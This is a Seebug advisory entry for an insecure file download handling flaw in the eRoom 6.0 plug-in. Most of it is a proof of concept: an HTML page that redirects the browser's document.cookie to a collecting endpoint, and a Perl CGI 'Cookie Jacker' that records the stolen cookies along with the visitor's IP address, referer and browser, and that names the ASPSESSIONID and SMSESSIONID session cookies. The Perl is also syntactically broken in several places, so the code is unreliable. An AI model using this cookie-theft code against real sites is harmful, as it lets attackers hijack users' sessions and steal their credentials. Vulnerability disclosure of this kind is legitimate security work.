eRoom 6.0 Plug-In Insecure File Download Handling Vulnerability

ID SSV:79601
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00


No description provided by source.


The eRoom plug-in is prone to an insecure file download handling vulnerability.

The issue is due to a design fault, where files that are shared by users are apparently passed to default file handlers when downloaded. This can occur without user knowledge, and can be a security risk for certain file types on certain platforms. 

 /* cookie.html */
    <title>Raiding the cookie jar</title>

    <script>document.location='' +document.cookie</script>


  /* cookie.cgi */
  use CGI qw(:standard);
  use CGI::Carp qw(warningsToBrowser fatalsToBrowser);
  use strict;

  my $break = "<br>";
  my $browser = $ENV{'HTTP_USER_AGENT'};
  my $cookie = $ENV{'QUERY_STRING'};
  my $remote = $ENV{'REMOTE_ADDR'};
  my $referer = $ENV{'HTTP_REFERER'};
  my $reqmeth = $ENV{'REQUEST_METHOD'};

  print header;

  print "<html>",
        "<head><title>Cookie Jacker</title></head>",
        "ASPSESSIONID & SMSESSIONID could be useful for something? ;)",
        "<img src=\"/cookiemonster.jpg\">",

  $cookie =~ s/;%20/$break/g;

  if($browser =~ /MSIE/) {
                print "Come on, is this the 90s or smtng!$break";
        } else {
                print "j00 are l33t$break";

  print "Client connection came from $remote$break",
        "Refered by $referer$break",
        "Using $reqmeth$break$break",

  print end_html;